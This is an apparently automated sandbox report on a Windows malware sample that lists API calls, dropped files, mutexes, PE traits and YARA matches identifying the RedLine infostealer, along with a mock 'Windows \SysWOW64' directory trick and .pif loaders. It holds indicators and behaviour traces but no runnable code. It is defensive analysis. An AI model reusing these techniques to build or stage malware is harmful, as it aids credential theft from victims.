                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00F07460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,7_2_00F07460
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,7_2_00EF4823
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF643A NtOpenThreadToken,NtOpenProcessToken,NtClose,7_2_00EF643A
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00F0C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,7_2_00F0C1FA
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00F0A135 NtSetInformationFile,7_2_00F0A135
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF6500 NtQueryInformationToken,NtQueryInformationToken,7_2_00EF6500
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EE4E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,7_2_00EE4E3B
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,7_2_00EF4759
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF64CA NtQueryInformationToken,15_2_00EF64CA
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00F07460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,15_2_00F07460
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,15_2_00EF4823
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF643A NtOpenThreadToken,NtOpenProcessToken,NtClose,15_2_00EF643A
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00F0C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,15_2_00F0C1FA
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00F0A135 NtSetInformationFile,15_2_00F0A135
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF6500 NtQueryInformationToken,NtQueryInformationToken,15_2_00EF6500
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EE4E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,15_2_00EE4E3B
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,15_2_00EF4759
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EE4C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,7_2_00EE4C10
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_02D0F7C8
                    Source: C:\Users\Public\alpha.pifFile created: C:\WindowsJump to behavior
                    Source: C:\Users\Public\alpha.pifFile created: C:\Windows \SysWOW64Jump to behavior
                    Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\605af54964cdb3b4.bin
                    Source: C:\Users\Public\alpha.pifFile deleted: C:\Windows \SysWOW64
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF20C40_2_02CF20C4
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EE74B17_2_00EE74B1
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF48757_2_00EF4875
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EE540A7_2_00EE540A
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EE4C107_2_00EE4C10
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00F041917_2_00F04191
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EE91447_2_00EE9144
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00F0695A7_2_00F0695A
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF4EC17_2_00EF4EC1
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF3EB37_2_00EF3EB3
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF5A867_2_00EF5A86
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00F0769E7_2_00F0769E
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EED6607_2_00EED660
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00F03E667_2_00F03E66
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EE6E577_2_00EE6E57
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EE7A347_2_00EE7A34
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EEEE037_2_00EEEE03
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF0BF07_2_00EF0BF0
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF07407_2_00EF0740
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EE6B207_2_00EE6B20
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_004028B013_2_004028B0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_0041824413_2_00418244
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_004193C413_2_004193C4
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_0044E3F613_2_0044E3F6
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_00402B9013_2_00402B90
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_004073A013_2_004073A0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_00408C6013_2_00408C60
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_0040DC1113_2_0040DC11
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_00407C3F13_2_00407C3F
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_00418CCC13_2_00418CCC
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_00406CA013_2_00406CA0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_0041A4BE13_2_0041A4BE
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_0040165013_2_00401650
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_00402F2013_2_00402F20
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_0041878813_2_00418788
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_00402F8913_2_00402F89
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_05AB096013_2_05AB0960
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_05AB684013_2_05AB6840
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_05AB12DC13_2_05AB12DC
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_007000D913_2_007000D9
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006C51EE13_2_006C51EE
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_007039A313_2_007039A3
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006F598013_2_006F5980
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006C6EAF13_2_006C6EAF
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006C7B7113_2_006C7B71
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006FD58013_2_006FD580
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006FC7F013_2_006FC7F0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006C7F8013_2_006C7F80
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006F378013_2_006F3780
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_02AC102013_2_02AC1020
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_02AC103013_2_02AC1030
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_064317F813_2_064317F8
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_0643A50013_2_0643A500
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_06430F2813_2_06430F28
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_06430BE013_2_06430BE0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_0643D9B013_2_0643D9B0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_064337E713_2_064337E7
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_064337F813_2_064337F8
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_06DC31C313_2_06DC31C3
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EE74B115_2_00EE74B1
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF487515_2_00EF4875
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EE540A15_2_00EE540A
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EE4C1015_2_00EE4C10
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00F0419115_2_00F04191
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EE914415_2_00EE9144
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00F0695A15_2_00F0695A
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF4EC115_2_00EF4EC1
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF3EB315_2_00EF3EB3
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF5A8615_2_00EF5A86
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00F0769E15_2_00F0769E
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EED66015_2_00EED660
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00F03E6615_2_00F03E66
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EE6E5715_2_00EE6E57
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EE7A3415_2_00EE7A34
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EEEE0315_2_00EEEE03
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF0BF015_2_00EF0BF0
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EF074015_2_00EF0740
                    Source: C:\Users\Public\alpha.pifCode function: 15_2_00EE6B2015_2_00EE6B20
                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: String function: 0040E1D8 appears 42 times
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: String function: 02CF44DC appears 74 times
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: String function: 02CF46D4 appears 244 times
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: String function: 02D0894C appears 56 times
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: String function: 02CF4500 appears 33 times
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: String function: 02CF4860 appears 949 times
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: String function: 02D089D0 appears 45 times
                    Source: elevation_service.exe.13.drStatic PE information: Number of sections : 12 > 10
                    Source: elevation_service.exe0.13.drStatic PE information: Number of sections : 12 > 10
                    Source: C6dAUcOA6M.exeBinary or memory string: OriginalFilename vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021ADE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.00000000209D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1540095281.0000000021EA2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A54000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021B3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1576898183.000000007FAAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1453650948.00000000023A5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
                    Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                    Source: C6dAUcOA6M.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 13.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 40.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 32.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 13.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 32.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: armsvc.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: alg.exe.13.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: AppVClient.exe.13.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: DiagnosticsHub.StandardCollector.Service.exe.13.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: FXSSVC.exe.13.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: elevation_service.exe.13.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: elevation_service.exe0.13.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: armsvc.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: alg.exe.13.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: AppVClient.exe.13.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: DiagnosticsHub.StandardCollector.Service.exe.13.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: FXSSVC.exe.13.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: elevation_service.exe.13.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: elevation_service.exe0.13.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@59/159@135/22
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF7FD4 GetDiskFreeSpaceA,0_2_02CF7FD4
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,13_2_004019F0
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D06DC8 CoCreateInstance,0_2_02D06DC8
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,13_2_004019F0
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006ECBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,13_2_006ECBD0
                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-605af54964cdb3b4-inf
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: NULL
                    Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-605af54964cdb3b49ea72c54-b
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-605af54964cdb3b4cd68e75b-b
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCommand line argument: 08A13_2_00413780
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
